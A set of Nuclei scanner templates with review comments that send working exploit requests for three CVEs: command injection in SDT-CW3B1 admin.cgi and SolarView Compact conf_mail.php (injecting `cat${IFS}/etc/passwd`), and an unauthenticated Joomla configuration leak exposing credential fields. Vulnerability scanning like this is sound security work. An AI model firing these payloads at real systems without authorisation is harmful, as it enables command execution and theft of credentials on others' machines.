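├── README.md
├── CVE-2021-46422.yaml
├── CVE-2022-30525.yaml
└── CVE-2023-23752.yaml


/README.md:
--------------------------------------------------------------------------------
# Nuclei POC 模板

--------------------------------------------------------------------------------
/CVE-2021-46422.yaml:
--------------------------------------------------------------------------------
# Nuclei check for CVE-2021-46422: OS command injection through the Cmd
# parameter of /cgi-bin/admin.cgi on SDT-CW3B1 1.1.0.
# This is an active check: it runs `id` on the device instead of fingerprinting
# a version, and it sends no credentials, so a match means the management CGI
# executes commands for unauthenticated callers.
# Mitigation: keep the admin interface off untrusted networks and apply the
# vendor's fixed firmware.
id: CVE-2021-46422

info:
  name: SDT-CW3B1 1.1.0 - OS command injection
  author: remote
  # NOTE(review): unauthenticated command execution is usually rated above
  # "high"; confirm the rating against the NVD entry before relying on it for
  # triage.
  severity: high
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46422
    - https://www.exploit-db.com/exploits/50936
  tags: cve,cve2021
  classification:
    cve-id: CVE-2021-46422

requests:
  - method: GET
    path:
      - "{{RootURL}}/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{exploit}}"

    payloads:
      exploit:
        - "id"
    attack: pitchfork
    matchers:
      - type: regex
        part: body
        regex:
          # The original "uid=.*" fired on any body containing "uid=" (for
          # example a link with a uid query parameter). Require the shape of
          # real `id` output, "uid=<n>(<name>) gid=<n>", to cut false positives.
          - 'uid=\d+(\([^)]*\))?\s+gid=\d+'

--------------------------------------------------------------------------------
/CVE-2022-30525.yaml:
--------------------------------------------------------------------------------
# Nuclei check for the SolarView Compact 6.0 OS command injection in the
# mail_address field of /conf_mail.php.
# The template was labelled CVE-2022-30525, but its name, its request and its
# own reference all describe CVE-2022-29303 (SolarView Compact). The id and
# cve-id below are corrected so findings are not filed under an unrelated
# product; the file name still carries the old number and should be renamed to
# match.
# This is an active check: it makes the target print /etc/passwd.
id: CVE-2022-29303

info:
  name: SolarView Compact 6.0 - OS Command Injection
  author: remote
  # NOTE(review): confirm the rating against the NVD entry for CVE-2022-29303.
  severity: high
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29303
    - https://www.exploit-db.com/exploits/50940
  tags: cve,cve2022
  classification:
    cve-id: CVE-2022-29303

requests:
  - raw:
      - |
        POST /conf_mail.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        mail_address=%3B{{exploit}}%3B&button=%83%81%81%5B%83%8B%91%97%90M


    payloads:
      exploit:
        - "cat${IFS}/etc/passwd"
    attack: pitchfork
    matchers:
      # Matches the root entry of a passwd file echoed back in the response.
      - type: regex
        part: body
        regex:
          - "root:.*:0:0"
--------------------------------------------------------------------------------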
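/CVE-2023-23752.yaml:
--------------------------------------------------------------------------------
# Nuclei check for CVE-2023-23752: improper access check on the Joomla
# webservice API. The request reads /api/index.php/v1/config/application
# without credentials; a vulnerable site answers with its configuration as
# JSON, including credential fields.
# Remediation for a match: update Joomla to a release that fixes
# CVE-2023-23752 and rotate any credentials the endpoint returned.
id: CVE-2023-23752

info:
  name: CVE-2023-23752-joomla
  author: cxaqhq
  # Raised from "info": a match means configuration secrets are readable
  # without authentication. NOTE(review): confirm against the NVD rating.
  severity: medium
  # The generator placeholders ("description", "https://", "tags") are
  # replaced with real metadata so the finding can be triaged and filtered.
  description: "Improper access check in Joomla webservice endpoints; the unauthenticated config/application API call returns site configuration, including credential fields."
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-23752
  tags: cve,cve2023,joomla

requests:
  - raw:
      # The Cookie header captured from the author's browser session was
      # dropped: the check is unauthenticated, and a fixed session value would
      # otherwise be sent to every scanned host and stay published in the
      # repository.
      - |+
        GET /api/index.php/v1/config/application?public=true HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close
    matchers-condition: and
    matchers:
      # Bare "password" and "attributes" also appear on ordinary HTML pages
      # (a login form answered with 200). Match them as quoted JSON keys and
      # require a JSON content type so only an API response counts.
      - type: word
        part: body
        words:
          - '"password"'
          - '"attributes"'
        condition: and

      - type: word
        part: header
        words:
          - "json"
        case-insensitive: true

      - type: status
        status:
          - 200

--------------------------------------------------------------------------------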